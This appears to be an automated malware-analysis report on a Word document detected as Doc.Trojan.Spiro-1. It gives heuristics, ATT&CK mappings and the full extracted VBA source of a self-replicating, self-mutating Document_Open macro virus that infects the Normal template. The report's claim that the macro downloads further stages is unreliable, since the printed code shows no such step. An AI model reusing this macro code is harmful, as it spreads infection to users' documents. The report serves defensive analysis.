MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code within Office documents. The macro attempts to modify the project description to 'WM.Spiroheta' and appears to be designed to download or execute further stages, as indicated by the code that deletes and adds lines to the code module. The ClamAV detection of 'Doc.Trojan.Spiro-1' further supports its malicious nature.
Heuristics 3
-
ClamAV: Doc.Trojan.Spiro-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Spiro-1
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2508 bytes |
SHA-256: 97a9036a74254650ef112ae317753d8a9a7dc1558080b9d983438ca95e5d0867 |
|||
|
Detection
ClamAV:
Doc.Trojan.Spiro-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() 'Private Sub Document_Open() On Error Resume Next 'On Error Resume Next Set vHost = ThisDocument.VBProject.VBComponents(1).CodeModule 'Set v235234 = ThisDocument.VBProject.VBComponents(1).CodeModule vkod = vHost.Lines(1, vHost.CountOfLines) 'k092345 = v235234.Lines(1, v235234.CountOfLines) If ThisDocument = ActiveDocument Then Set t759823 = NormalTemplate Else Set t759823 = ActiveDocument 'If ThisDocument = ActiveDocument Then Set h759823 = NormalTemplate Else Set h759823 = ActiveDocument If t759823.VBProject.VBComponents(1).CodeModule.CountOfLines <> 49 Then 'Set f785109 = h759823.VBProject.VBComponents(1).CodeModule With t759823.VBProject.VBComponents(1).CodeModule 'If f785109.CountOfLines <> 49 Then .deletelines 1, .CountOfLines 'With f785109 .addfromstring vkod '.deletelines 1, .CountOfLines: .addfromstring k092345 End With 'End With t759823.VBProject.Description = "WM.Spiroheta" 'h759823.VBProject.Description = "WM.Spiroheta": End If End If 'For t234566 = 1 To ThisDocument.VBProject.VBComponents(1).CodeModule.CountOfLines Step 2 For a = 2 To ThisDocument.VBProject.VBComponents(1).CodeModule.CountOfLines Step 2 'n096583 = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(t234566, 1) naskod = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(a, 1) 'If Left(n096583, 1) = "'" Then If Left(naskod, 1) = "'" Then 'd099874 = Right(n096583, Len(n096583) - 1) desni = Right(naskod, Len(naskod) - 1) 'ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine t234566, d099874 ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine a, desni 'End If End If 'd099874 = "" desni = "" 'Next Next 'For g650235 = 2 To ThisDocument.VBProject.VBComponents(1).CodeModule.CountOfLines Step 2 For t = 1 To ThisDocument.VBProject.VBComponents(1).CodeModule.CountOfLines Step 2 'j719579 = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(g650235, 1) naskod = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(t, 1) 'ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine g650235, "'" & j719579 ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine t, "'" & naskod 'Next Next 'End Sub End Sub |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.